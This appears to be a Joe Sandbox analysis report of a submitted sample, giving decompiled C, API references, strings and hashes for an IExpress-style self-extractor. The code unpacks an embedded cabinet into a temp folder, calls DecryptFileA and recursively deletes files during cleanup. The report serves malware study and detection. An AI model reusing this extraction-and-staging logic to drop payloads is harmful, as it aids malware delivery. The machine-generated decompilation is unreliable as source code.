							__eflags =  *0xeb9a34 & 0x00000008;
							if(( *0xeb9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xeb9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xeb89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xeb9124 = 0;
									_t66 = 1;
								} else {
									_t40 =  &_a4; // 0xeb6277
									_t66 = E00EB268B( *_t40, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xeb9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xeb89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xeb89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xeb9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00EB44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xeb9124 = E00EB6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00EB44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xeb9124 = E00EB6285();
					_t66 = 0;
					L33:
					return E00EB6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x00eb597d
0x00eb5988
0x00eb598f
0x00eb599a
0x00eb59a6
0x00eb59a8
0x00eb59af
0x00eb59b9
0x00eb59dd
0x00eb59e4
0x00eb59f1
0x00eb59fe
0x00eb5a0b
0x00eb5a13
0x00eb5a19
0x00eb5a1b
0x00eb5ba1
0x00eb5baf
0x00eb5bbd
0x00eb5bd8
0x00eb5bde
0x00eb5be3
0x00eb5bec
0x00eb5bf0
0x00eb5bfc
0x00eb5c02
0x00eb5c02
0x00eb5c02
0x00eb5c04
0x00eb5c04
0x00000000
0x00eb5c04
0x00eb5a27
0x00eb5a3a
0x00eb5a46
0x00eb5a48
0x00eb5a4a
0x00000000
0x00000000
0x00eb5a64
0x00eb5a6a
0x00eb5a6c
0x00eb5abc
0x00eb5ac2
0x00eb5ac9
0x00eb5aca
0x00eb5aca
0x00eb5acc
0x00eb5acc
0x00eb5acf
0x00eb5ad1
0x00000000
0x00000000
0x00eb5ad3
0x00eb5ad6
0x00eb5ad8
0x00000000
0x00000000
0x00eb5ada
0x00eb5adc
0x00eb5add
0x00eb5add
0x00eb5ae0
0x00000000
0x00000000
0x00000000
0x00eb5ae0
0x00eb5ae2
0x00eb5ae4
0x00eb5ae6
0x00eb5ae6
0x00eb5ae6
0x00eb5ae9
0x00eb5aeb
0x00eb5af0
0x00eb5af6
0x00eb5af8
0x00eb5af9
0x00eb5af9
0x00eb5afb
0x00000000
0x00000000
0x00eb5afd
0x00eb5aff
0x00eb5b00
0x00eb5b03
0x00000000
0x00000000
0x00000000
0x00eb5b03
0x00eb5b05
0x00eb5b08
0x00eb5b20
0x00eb5b27
0x00eb5b52
0x00eb5b52
0x00eb5b5b
0x00eb5b62
0x00eb5b6b
0x00eb5b6d
0x00eb5b76
0x00eb5b7d
0x00eb5b83
0x00eb5b7f
0x00eb5b7f
0x00eb5b7f
0x00eb5b6f
0x00eb5b72
0x00eb5b72
0x00eb5b85
0x00eb5b98
0x00eb5b9e
0x00eb5b87
0x00eb5b8c
0x00eb5b8f
0x00eb5b8f
0x00000000
0x00eb5b85
0x00eb5b29
0x00eb5b33
0x00000000
0x00000000
0x00eb5b35
0x00eb5b48
0x00eb5b4a
0x00000000
0x00eb5b4a
0x00eb5b0f
0x00eb5b16
0x00000000
0x00eb5b16
0x00eb5a7c
0x00eb5a8a
0x00eb5aa5
0x00eb5aab
0x00000000
0x00eb59bb
0x00eb59c0
0x00eb59c7
0x00eb59d1
0x00eb59d6
0x00eb5c05
0x00eb5c14
0x00eb5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00EB59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00EB59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00EB5A13
MulDiv.KERNEL32(?,?,00000400), ref: 00EB5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00EB5A64
memset.MSVCRT ref: 00EB5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00EB5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00EB5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00EB5BFC

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285

Strings

wb, xrefs: 00EB5B8C

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID: wb
API String ID: 4237285672-1758207633
Opcode ID: 7c8eb2e6d82eb586090f118fb73c627dd16676ddb195036bdad09f86148140ba
Instruction ID: 026e3ae3fc0247dd6a8865ecb25b1de6cb21815ff977cc1568cc0ab6433692a4
Opcode Fuzzy Hash: 7c8eb2e6d82eb586090f118fb73c627dd16676ddb195036bdad09f86148140ba
Instruction Fuzzy Hash: ED71B2B290020CAFEB169F64DCC5FFBB7ADEB48344F1451A9F545F2141EA309E898B60

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00EB4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xeb9144 = E00EB468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xeb9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xeb8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xeb8584, 0x841), 5);
				}
				_t10 = E00EB4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00EB4CA0, E00EB4CC0, E00EB4980, E00EB4A50, E00EB4AD0, E00EB4B60, E00EB4BC0, 1, 0xeb9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xeb9148; // 0x0
						_t24 =  *0xeb8584; // 0x0
						E00EB44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xeb1140, 0, E00EB4CD0, 0, 0xeb9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xeb8584; // 0x0
					E00EB44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xeb9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xeb9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xeb91d8; // 0x0
						if(_t47 == 0) {
							E00EB44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xeb8a38 & 0x00000001) == 0 && ( *0xeb9a34 & 0x00000001) == 0) {
						SendMessageA( *0xeb8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00eb4fe0
0x00eb4fe6
0x00eb4ff9
0x00eb500d
0x00eb5013
0x00eb501a
0x00eb5163
0x00eb5163
0x00eb5020
0x00eb5027
0x00eb5037
0x00eb5051
0x00eb5051
0x00eb5057
0x00eb505e
0x00eb50a7
0x00eb50ad
0x00eb50b4
0x00eb50e8
0x00eb50e8
0x00eb50ee
0x00eb50ff
0x00eb5104
0x00eb5106
0x00000000
0x00eb5106
0x00eb50cd
0x00eb50d3
0x00eb50da
0x00000000
0x00000000
0x00eb50dd
0x00eb50e6
0x00000000
0x00000000
0x00000000
0x00eb5060
0x00eb5060
0x00eb5070
0x00eb5075
0x00eb5107
0x00eb5107
0x00eb510e
0x00eb5111
0x00eb5117
0x00eb5117
0x00eb511f
0x00eb5121
0x00eb5127
0x00eb5135
0x00eb5135
0x00eb5127
0x00eb5141
0x00eb5159
0x00eb5159
0x00000000
0x00eb515f

APIs

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00EB4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00EB5006
LockResource.KERNEL32(00000000), ref: 00EB500D
GetDlgItem.USER32(00000000,00000842), ref: 00EB5030
ShowWindow.USER32(00000000), ref: 00EB5037
GetDlgItem.USER32(00000841,00000005), ref: 00EB504A
ShowWindow.USER32(00000000), ref: 00EB5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00EB5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00EB5159

Strings

CABINET, xrefs: 00EB4FE6, 00EB4FF7
*MEMCAB, xrefs: 00EB50C7

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 551a6bd89c3ab9ad819e86956b84fc526ce5e1e3739161b4ad027f208cbdb819
Instruction ID: 163d0eb012412f9c4b40e2fa24b8c4af638a91930076fb06a1636e80c3424c16
Opcode Fuzzy Hash: 551a6bd89c3ab9ad819e86956b84fc526ce5e1e3739161b4ad027f208cbdb819
Instruction Fuzzy Hash: A731ECF16427027FEB205B6BAD89FE7369CE744759F081224FA01B22E3DBB49C048A50

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00EB2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xeb8004; // 0x92ae1240
				_v8 = _t9 ^ _t46;
				if( *0xeb8a38 != 0) {
					L5:
					_t11 = E00EB5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00EB6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00EB55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00EB658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xeba288("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xeb8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xeb8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xeb8d48 & 0x000000c0;
									if(( *0xeb8d48 & 0x000000c0) == 0) {
										_t41 =  *0xeb9a40; // 0x3, executed
										_t26 = E00EB256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xeb8a24; // 0x0
									 *0xeb9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xeb8a38;
										if( *0xeb8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00EB4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xeb9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00EB3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xeb8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00EB3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00EB44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xeb9124 = E00EB6285();
							goto L16;
						}
						_t59 =  *0xeb9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00EB621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xeb8a24;
				if( *0xeb8a24 != 0) {
					L4:
					_t34 = E00EB3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00EB51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xeb8a38;
				if( *0xeb8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00eb2f1d
0x00eb2f28
0x00eb2f2f
0x00eb2f3d
0x00eb2f6c
0x00eb2f6c
0x00eb2f71
0x00eb2f73
0x00eb3041
0x00eb3041
0x00eb3043
0x00eb3053
0x00eb3053
0x00eb2f79
0x00eb2f80
0x00000000
0x00eb2f86
0x00eb2f86
0x00eb2f93
0x00eb2f9e
0x00eb2fa0
0x00eb2fa6
0x00eb2fb8
0x00eb2fba
0x00eb2fbe
0x00eb2fc6
0x00eb2fcc
0x00eb2fd4
0x00eb2fd6
0x00eb2fd8
0x00eb2fe0
0x00eb2fe6
0x00eb2fee
0x00eb2ff0
0x00eb2ff5
0x00eb2ff5
0x00eb2fee
0x00eb2fd4
0x00eb2ff8
0x00eb2ffe
0x00eb3004
0x00eb3017
0x00eb301c
0x00eb3024
0x00eb3054
0x00eb305a
0x00eb3065
0x00eb3065
0x00eb306c
0x00eb306e
0x00eb3075
0x00eb307a
0x00eb307a
0x00eb307c
0x00eb3081
0x00eb3087
0x00eb3089
0x00eb30a1
0x00eb30a1
0x00eb30a9
0x00eb30ab
0x00eb30ad
0x00eb30af
0x00eb30af
0x00eb30ad
0x00eb30b6
0x00000000
0x00eb308b
0x00eb308b
0x00eb3091
0x00000000
0x00000000
0x00eb3093
0x00eb3098
0x00eb309a
0x00000000
0x00000000
0x00eb309c
0x00000000
0x00eb309c
0x00eb3089
0x00eb305c
0x00eb3061
0x00eb3063
0x00000000
0x00000000
0x00000000
0x00eb3063
0x00eb302b
0x00eb3032
0x00eb303c
0x00000000
0x00eb303c
0x00eb3006
0x00eb300c
0x00000000
0x00000000
0x00eb300e
0x00eb3015
0x00000000
0x00000000
0x00000000
0x00eb3015
0x00eb2f80
0x00eb2f3f
0x00eb2f46
0x00eb2f5f
0x00eb2f5f
0x00eb2f64
0x00eb2f66
0x00000000
0x00000000
0x00000000
0x00eb2f66
0x00eb2f4f
0x00000000
0x00000000
0x00eb2f55
0x00eb2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00EB2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00EB2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00EB2FC6
DecryptFileA.ADVAPI32 ref: 00EB2FE6
FreeLibrary.KERNEL32(00000000), ref: 00EB2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB301C

Part of subcall function 00EB51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00EB2F4D,?,00000002,00000000), ref: 00EB5201

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB2FDB, 00EB3017
DecryptFileA, xrefs: 00EB2FC0
advapi32.dll, xrefs: 00EB2F99

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2712585282
Opcode ID: 4fbcb74fba5398b5f306a2a9a910fb3bea21939da88410096ed5d60ac6503bef
Instruction ID: 6cdb1fc08de00cb1ab1214db4cf95ac0e0d94a1856f018a275a2d202f113ef64
Opcode Fuzzy Hash: 4fbcb74fba5398b5f306a2a9a910fb3bea21939da88410096ed5d60ac6503bef
Instruction Fuzzy Hash: 4C41C931A012058EDB30BB76AD476E773FC9F54758F102269EA41F21A2EF74CE84CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00EB5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00EB5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xeb8004; // 0x92ae1240
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xeb91e4;
					_t42 = 0x104;
					E00EB1680(0xeb91e4, 0x104);
					L14:
					_t13 = E00EB58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xeb9124 = 0;
							_t14 = 1;
							L24:
							return E00EB6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00EB597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xeb8a20; // 0x0
						if(_t61 != 0) {
							 *0xeb8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xeb9124 = E00EB6285();
						goto L22;
					}
					 *0xeb8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00EB53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xeb91e4;
				E00EB1781(0xeb91e4, 0x104, __ecx,  &_v268);
				if(( *0xeb9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00EB658A(_t48, 0x104, 0xeb1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00EB658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00eb5472
0x00eb5479
0x00eb5481
0x00eb5484
0x00eb551c
0x00eb5521
0x00eb5528
0x00eb552d
0x00eb552f
0x00eb5539
0x00eb554d
0x00eb554d
0x00eb5552
0x00eb5585
0x00eb5585
0x00eb558b
0x00eb558d
0x00eb559d
0x00eb559d
0x00eb5557
0x00eb555e
0x00000000
0x00000000
0x00eb5560
0x00eb5566
0x00eb5569
0x00eb556f
0x00eb556f
0x00eb5581
0x00eb5581
0x00000000
0x00eb5581
0x00eb5545
0x00eb557c
0x00000000
0x00eb557c
0x00eb5547
0x00000000
0x00eb5547
0x00eb548a
0x00eb5490
0x00eb5497
0x00000000
0x00000000
0x00eb549d
0x00eb54ab
0x00eb54b4
0x00eb54c0
0x00eb550c
0x00eb5511
0x00eb5515
0x00000000
0x00eb5515
0x00eb54c9
0x00eb54d6
0x00eb54d8
0x00eb54fe
0x00eb5503
0x00eb5507
0x00000000
0x00eb5507
0x00eb54da
0x00eb54dd
0x00eb54f7
0x00000000
0x00eb54f7
0x00eb54df
0x00eb54e2
0x00eb54f0
0x00000000
0x00eb54f0
0x00eb54e7
0x00000000
0x00000000
0x00eb54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB556F

Part of subcall function 00EB53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB53FB
Part of subcall function 00EB53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5402
Part of subcall function 00EB53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB541F
Part of subcall function 00EB53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB542B
Part of subcall function 00EB53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5434

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB547D, 00EB5481, 00EB54AB, 00EB551C, 00EB553C, 00EB5568
alpha, xrefs: 00EB54F0
mips, xrefs: 00EB54F7
ppc, xrefs: 00EB54E9
i386, xrefs: 00EB54FE

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-1143122538
Opcode ID: fc0f66f2974aa09af39510678f4b393497188d7ce381ce98108e30c9c96af0bb
Instruction ID: 504ae8c51178fa33a52d854765b03f31172bbf1104a5c192566bd3713c62ab86
Opcode Fuzzy Hash: fc0f66f2974aa09af39510678f4b393497188d7ce381ce98108e30c9c96af0bb
Instruction Fuzzy Hash: 56313A72B02B055BDB215F2AAD047FF77DFAB81355F08226AA502B2250DB708E058695

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00EB2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xeb8004; // 0x92ae1240
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00EB6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00EB1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00EB16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00EB1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00EB16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00EB16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00EB658A( &_v280, 0x104, 0xeb1140);
								E00EB2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00eb2398
0x00eb239e
0x00eb23a3
